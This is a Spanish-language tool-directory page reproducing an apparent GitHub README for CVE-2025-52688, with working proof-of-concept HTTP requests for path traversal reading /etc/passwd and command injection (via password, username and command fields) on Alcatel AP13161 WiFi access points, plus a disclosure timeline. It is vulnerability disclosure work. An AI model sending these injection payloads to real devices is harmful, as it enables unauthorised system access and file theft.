Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-52688 — Pruebas de concepto para CVE-2025-52688: vulnerabilidades de inyección de comandos no autenticada y lectura arbitraria de archivos en puntos de acceso WiFi empresariales Alcatel AP13161, descubiertas durante un hackathon de IoT/OT. | Kitploit
Herramientas/GitHubGitHub/joelczk/cve-2025-52688
Seguridad IoTAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebComando y ControlSeguridad de Hardware e IoT
GitHubjoelczk/cve-2025-52688

CVE-2025-52688

Pruebas de concepto para CVE-2025-52688: vulnerabilidades de inyección de comandos no autenticada y lectura arbitraria de archivos en puntos de acceso WiFi empresariales Alcatel AP13161, descubiertas durante un hackathon de IoT/OT.

Ver Repositorio
21hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-52688

Productos afectados

Alcatel AP13161 - Punto de acceso WiFi empresarial

Resumen

Hay 2 vulnerabilidades principales que se abordan aquí:

  • Falta de saneamiento de entrada en múltiples parámetros web JSON que permite inyectar caracteres maliciosos como ; para causar un ataque de inyección de comandos
  • Falta de saneamiento adecuado y control de acceso en el parámetro fileName que permite la lectura arbitraria no autorizada de archivos en el servidor

Esta vulnerabilidad fue descubierta durante el Hackathon IoT/OT SPIRICYBER-24 organizado por CSA (Agencia de Ciberseguridad de Singapur) y NTU

POC

POC de lectura de archivos

El parámetro fileName permite que cualquier usuario no autenticado pueda ver cualquier archivo del sistema. Al recorrer los directorios, podemos leer archivos sensibles del servidor

root@kitploit:~
POST /echo.fcgi HTTP/1.1
Host: XXXXX
User-Agent: Mozilla/5.0 (Linux; U; Android 7.0; en-us; MI 5 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.146 Mobile Safari/537.36 XiaoMi/MiuiBrowser/9.0.3
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 110
Connection: keep-alive
{
    "id":1,
    "jsonrpc":"2.0",
    "username":"xxx",
    "method":"downloader.cert",
    "params":{
        "fileName":"/../../etc/passwd"
    }
}

POC de RCE #1

El parámetro password en el endpoint /apiaccess es vulnerable a una vulnerabilidad de inyección de comandos no autenticada que permite a cualquier usuario no autenticado ejecutar comandos del sistema

root@kitploit:~
POST /apiaccess HTTP/1.1
Host: XXXX
Cache-Control: max-age=0
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
{
    "id":1,
    "jsonrpc":"2.0",
    "method":"system.getPvc",
    "params":{
        "username": "Administrator",
        "password":";echo pwned1234 > /tmp/test.txt"
    }
}

POC de RCE #2

El parámetro username en el endpoint echo.fcgi es vulnerable a una vulnerabilidad de inyección de comandos no autenticada que permite a cualquier usuario no autenticado ejecutar comandos del sistema

root@kitploit:~
POST /echo.fcgi HTTP/1.1
Host: 
Cache-Control: max-age=0
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: application/json, text/plain, */*
{
    "id":1,
    "jsonrpc":"2.0",
    "username":"Administrator",
    "method":"user.logout",
    "params":{
        "username": ";echo pwned > /tmp/test.txt",
        "Sessionid":""
    }
}

POC de RCE #3

El parámetro command permite a los usuarios autenticados ejecutar funciones y binarios del sistema para probar la funcionalidad del poste de luz. Sin embargo, debido a un filtrado de entrada y una lista negra insuficientes, podemos omitir los filtros para ejecutar una ejecución remota de código autenticada que permite a cualquier usuario conectado ejecutar comandos del sistema

root@kitploit:~
POST /echo.fcgi HTTP/1.1
Host: XXXX
Content-Length: 349
Accept: application/json, text/plain, */*
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
{
    "id":1,
    "jsonrpc":"2.0",
    "method":"expressmessage.call",
    "username":"Administrator",
    "session":"XXXXXX",
    "topic":"WMA/DC:XXXXXXX",
    "params":{
        "version":"3.0",
        "messageID":1,
        "macAddress":"DC:XXXXX",
        "option":"update",
        "method":"ap_manage.exce_command",
        "contents":{
            "command":"tech_support_command 9 127.0.0.1\nid"
       }
    }
}

Cronología

2024-08-10: Informe enviado al equipo de triaje del Hackathon IoT SpiritCyber 2024-08-20: Informe aceptado por el equipo de triaje 2025-06-25: CSA SingCert asigna CVE-2025-52688 2025-07-14: Divulgación pública

Aviso

https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-072 https://www.al-enterprise.com/-/media/567414972b57459697030898f92ac043.pdf

Descargar herramienta